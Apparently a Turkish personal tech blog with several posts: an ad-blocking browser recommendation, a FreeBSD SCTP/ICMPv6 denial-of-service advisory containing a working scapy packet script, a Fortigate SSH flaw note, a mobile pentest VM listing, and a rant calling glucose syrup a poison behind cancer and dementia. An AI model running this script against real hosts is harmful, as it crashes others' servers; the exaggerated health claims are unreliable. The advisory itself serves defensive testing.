Vedat FETAH Kimdir?

Ege Üniversitesi Bilgi İşlem Daire Başkanlığı bünyesinde kampüs güvenlik sistemleri yöneticisi olarak çalışma hayatıma devam ediyorum. Günlük yaşamda teknoloji ağırlıklı karşılaştığım ve beğendiğim yazıları paylaşmak amacıyla bu bloğu oluşturdum. Umarım birilerinin bilgilenmesini sağlar.

Halen Çalışmakta Olduğum Yer

Halen Ege Üniversitesi Uluslararası Bilgisayar Enstitüsü Binasında Bilgi İşlem Daire Başkanlığın'da çalışmaya devam etmekteyim.

31 Ocak 2016 Pazar

Android için Adblock Browser

Samsung Galaxy Note 3 kullanıcısı olarak son zamanlarda browserlarda reklam engelleme olayı can sıkıcı bir hal oldu. UC Browser ile reklamlar engelleniyor ancak hantal ve yavaş bir sistem. Bugün yeni Backbox 4.5 versiyonunu laptopuma kurduğumda klasik ayarları yapmaya başladım. Malum firefox için reklam engelleme amacı ile adblock plus kurulumunu yapmaya başladım bu sırada sitede Adblock Browser gözüme çarptı denemeye karar verdim. Telefonuma kurdum ve sonuç mükemmel. Browser ile ilgili detayları Google Play sayfasından aşağıda verdim. Dileyenler denesin. İndirme linki: https://play.google.com/store/apps/details?id=org.adblockplus.browser&hl=trhttps://play.google.com/store/apps/details?id=org.adblockplus.browser&hl=tr

Masaüstü tarayıcılar için en popüler reklam engelleyici, Android telefonunuz ve tabletiniz için artık mevcut.
Tüm web üzerinden ve ücretsiz olarak, Facebook, YouTube ve diğerlerinde istenmeyen reklamları engelleyin.


Adblock Plus tarafından geliştirilmiştir
• Yüksek kaliteli reklam engelleme
• 2006'dan beri piyasa lideri
• 400 milyon kereden fazla indirildi


Hızlı, verimli tarama
Reklamlar sayfaların yavaş yüklenmesine neden olabilir, veri planınızın yarısını yok edebilir ve pilin %20'sinden fazlasını tüketebilir. Adblock Tarayıcı yerleşik bir reklam engelleyiciye sahip olduğundan, şunları yapabilir:
• Sayfaları daha hızlı yükler
• Pil ve verileri korur


Güvenli ve gizli
Bir sürü kötü amaçlı yazılım ve izleme gibi istenmeyen şeyler, reklamlar arkasına gizlenebilir.
• Kötü amaçlı yazılım enfeksiyonu riskini azaltır
• Gizliliği geliştirir
• Stanford Üniversitesi, UC Santa Barbara, Electronic Frontier Foundation tarafından önerilir


Kontrol sizde
• Tüm reklamları engellemek için varsayılan ayarı değiştirin
• Kötü amaçlı yazılım, izleme
ve daha fazlasını devre dışı bırakın
• En sevdiğiniz web sitesinde reklamları destekleyin


Adblock Tarayıcı Desteği
Bir hata mı buldunuz ya da desteğe mi ihtiyacınız var? Android için Adblock Tarayıcı Destek sayfamızı ziyaret edin: https://adblockplus.org/redirect?link=adblock_browser_android_support


Adblock Tarayıcı Hakkında
Adblock Tarayıcı, dünyanın en popüler reklam engelleyici ekibi olan Adblock Plus tarafından geliştirildi. Masaüstü için Adblock Plus'a göz atın!


Şu adreslerde daha fazlasını keşfedin:
https://adblockplus.org/
Facebook: https://www.facebook.com/adblockplus
G+: https://plus.google.com/u/0/communities/104936844759781288661

27 Ocak 2016 Çarşamba

SCTP ICMPv6 error processing vulnerability (CVE-2016-1879)


Freebsd tabanlı sunucularda Ipv6 SCTP socketi kullanılarak yapılan ICMPv6 dos saldırısı sonucu freebsd sunucular etkilenmektedir. Aşağıda saldırı ve etkisi ile ilgili bir video da bulunmaktadır.

Bu açık FreeBSD sistemlerden (versiyon 9.3, 10.1 ve 10.2) SCTP desteği olan ve IPV6 default konfigürasyonunu kullananlar etkilenmektedir.

Sisteminizi korumak için;

1. Eğer gerekli değilse ipv6 desteğini kapatınız.
2. ICMPv6'yı ve IPv6 trafiğini firewallunuzda engelleyiniz.
3. SCTP stack desteğini çekirdeğinizi yeniden derleyerek kapatın.

Test amaçlı kullanılan python scripti aşağıdaki gibidir. Sistemlerinizin etkilenip etkilenmediğini test edebilirsiniz.

#!/usr/bin/env python # -*- coding: utf-8 -*- import argparse from scapy.all import * def get_args(): parser = argparse.ArgumentParser(description='#' * 78, epilog='#' * 78) parser.add_argument("-m", "--dst_mac", type=str, help="FreeBSD mac address") parser.add_argument("-i", "--dst_ipv6", type=str, help="FreeBSD IPv6 address") parser.add_argument("-I", "--iface", type=str, help="Iface") options = parser.parse_args() if options.dst_mac is None or options.dst_ipv6 is None: parser.print_help() exit() return options if __name__ == '__main__': options = get_args() sendp(Ether(dst=options.dst_mac) / IPv6(dst=options.dst_ipv6) / ICMPv6DestUnreach() / IPv6(nh=132, src=options.dst_ipv6, dst='fe80::230:56ff:fea6:648c'), iface=options.iface)


17 Ocak 2016 Pazar

Fortigate OS Version 4.x 5.0.7 Sürümleri Arasında SSH Güvenlik Açığı

Fortigate firewalların son günlerde yayınlanan açıkları bomba etkisi yaratmaya devam ediyor. En son yayınlanan ssh açığı ile sunucuya admin yetkisi ile bağlanabiliyorsunuz. Bu konuda yazılan exploitler yayınlanmaya başladı.

Ancak son zamanda farkına vardığım bir açık sayesinde hiçbir scripte ihtiyaç duymadan Fortigate firewalların bazı modellerinde default hashli şifre ve admin (Bu ad ve şifre kötü niyetli kullanımlara karşı verilmemiştir.) adıyla sisteme girebiliyorsunuz.

6 Ocak 2016 Çarşamba

Vezir Harika Bir Türk Mobil Pentest Dağıtımı...

Vezir adında bir Türk (Oğuzhan Topgül) tarafından yapıldığını öğrendiğim bir mobil penetrasyon test ortamı bugün dikkatimi çekti. Yazılım ile ilgili bilgiler orjinal sitesinden İngilizce olarak aşağıda verilmiştir.
Vezir-Project
Yet Another Linux Virtual Machine for Mobile Application Pentesting and Mobile Malware Analysis.

Main purpose of the Vezir is to provide up-to-date testing environment for mobile security researchers. Vezir (vizier, chess queen in Turkish) is based on Ubuntu and it is created with VMWare Fusion 6.0.4. In order to minimize compatibility issues, Vezir virtual machine is set to use hardware version 8 and therefore it is compatible with

ESXi 5.0
ESXi 5.1
Fusion 4.0
Fusion 5.0
Fusion 6.0
Workstation 8.0
Workstation 9.0
Workstation 10.0
virtualization environments

Vezir 2.0 uses XFCE desktop environment (Xubuntu) and based on Ubuntu 15.04

Update Status:

Vezir 2.0 latest version is Vezir 2.0.2 and updated on 3 Dec 2015

Vezir 1.0 latest update on 3 Oct 2015

Download

Download Vezir 2.0.2 from the link: https://goo.gl/LfPJkW

Download Vezir 1.0 older release from the link: https://goo.gl/yuieQf

Credentials

Username: vezir Password: vezir

Tools

Eclipse
Android Studio
Android SDK
Android NDK (Intentionally removed in Vezir 2.0)
libimobiledevice library
BinaryCookieReader
androguard
Drozer
JD-GUI
Jadx
dex2jar
Hopper
IDA Demo (Intentionally removed in Vezir 2.0)
plutil
baksmali
apktool
sqlmap
BurpSuite Free
Wireshark
sqlite3
sqlitebrowser
AXMLPrinter2
Graphviz Dot
Doxygen
Android Log Viewer
Simplify Deobfuscator
Genymotion
Virtualbox
MFFA (Media Fuzzing Framework for Android)
Vulnerable Labs (SecurityCompass InsecureBank, OWASP GoatDroid, Pentesterlab SQLi)
Enjarify
Apache HTTP server
BytecodeViewer - planned for future release (https://github.com/Konloch/bytecode-viewer)
All the tools above are put in the /home/vezir/ambar directory. Most of them are added to PATH, so you can easily run by just typing the name of the application.

Default keyboard layout is TR (Turkish-Q), but you can change it to English(US) in the login screen if you are not using TR layout.

Propolisi Kullanarak İnsanları Zehirlemek!!!

Bugün bir eczaneye yolum düştü. Bankın üzerinde Procap isimli bir ürünün broşürünü gördüm. Propolis kelimesini görünce alıp incelemeye koyuldum. Ürünün içerikleri büyük harflerle ballandıra ballandıra anlatılmış ama karınca duası gibi yazılan içerikler kısmında Glikoz Şurubunu görünce bir anda sinirlendim. 
Arkadaş bağışıklığı desteklemek için yaptığın şeyin içerisine neden bu zehiri koyarsın? 
Glikoz şurubunu özetlemek gerekirse: Kanser, obezite, hormon bozukluğu, şeker hastalığı, bunama, hipertansiyon, kalp, böbrek yetmezliği gibi birçok rahatsızlığa sebep olan glikoz şurubu hayatımıza girdiğinden bu yana bebek mamaları-bisküvilerinden tutun yaş pastalara kadar her türlü hazır tatlı gıdanın içinde yoğun şekilde yer alıyor. Konuyla ilgili uzman görüşlerinin yer aldığı referansları aşağıda veriyorum ilgilenenler bakabilir. Ayrıca aşağıdaki videoda konu ile ilgili bir haber videosu bulunmaktadır.




Glikoz şurubunun zararlarını anlatan siteler:

1. http://www.bilim-teknoloji.com/olumcul-zehir-glikoz-surubu/
2. http://hastaliktasagliktagelismelerhaberler.blogspot.com.tr/2013/04/etikette-glikoz-surubu-yazan-urunleri.html

Paylaş

Twitter Delicious Facebook Digg Stumbleupon Favorites